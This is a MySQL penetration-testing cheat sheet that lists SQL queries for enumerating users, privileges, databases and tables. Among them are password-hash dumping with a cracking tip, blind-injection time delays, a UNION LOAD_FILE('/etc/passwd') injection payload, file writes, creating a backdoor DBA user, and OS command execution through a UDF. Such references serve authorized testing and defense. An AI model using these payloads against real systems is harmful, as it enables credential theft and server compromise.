Version | SELECT @@version |
Comments | SELECT 1; #comment SELECT /*comment*/1; |
Current User | SELECT user(); SELECT system_user(); |
List Users | SELECT user FROM mysql.user; — priv |
List Password Hashes | SELECT host, user, password FROM mysql.user; — priv |
Password Cracker | John the Ripper will crack MySQL password hashes. |
List Privileges | SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privsSELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privsSELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns |
List DBA Accounts | SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv |
Current Database | SELECT database() |
List Databases | SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0 SELECT distinct(db) FROM mysql.db — priv |
List Columns | SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ |
List Tables | SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ |
Find Tables From Column Name | SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; — find table which have a column called ‘username’ |
Select Nth Row | SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0 SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0 |
Select Nth Char | SELECT substr(‘abcd’, 3, 1); # returns c |
Bitwise AND | SELECT 6 & 2; # returns 2 SELECT 6 & 1; # returns 0 |
ASCII Value -> Char | SELECT char(65); # returns A |
Char -> ASCII Value | SELECT ascii(‘A’); # returns 65 |
Casting | SELECT cast(’1′ AS unsigned integer); SELECT cast(’123′ AS char); |
String Concatenation | SELECT CONCAT(‘A’,'B’); #returns AB SELECT CONCAT(‘A’,'B’,'C’); # returns ABC |
If Statement | SELECT if(1=1,’foo’,'bar’); — returns ‘foo’ |
Case Statement | SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # returns A |
Avoiding Quotes | SELECT 0×414243; # returns ABC |
Time Delay | SELECT BENCHMARK(1000000,MD5(‘A’)); SELECT SLEEP(5); # >= 5.0.12 |
Make DNS Requests | Impossible? |
Command Execution | If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture which may or may not be the same as your attack platform. |
Local File Access | …’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, can only read world-readable files. SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, write to file system |
Hostname, IP Address | SELECT @@hostname; |
Create Users | CREATE USER test1 IDENTIFIED BY ‘pass1′; — priv |
Delete Users | DROP USER test1; — priv |
Make User DBA | GRANT ALL PRIVILEGES ON *.* TO test1@’%'; — priv |
Location of DB files | SELECT @@datadir; |
Default/System Databases | information_schema (>= mysql 5.0) mysql |
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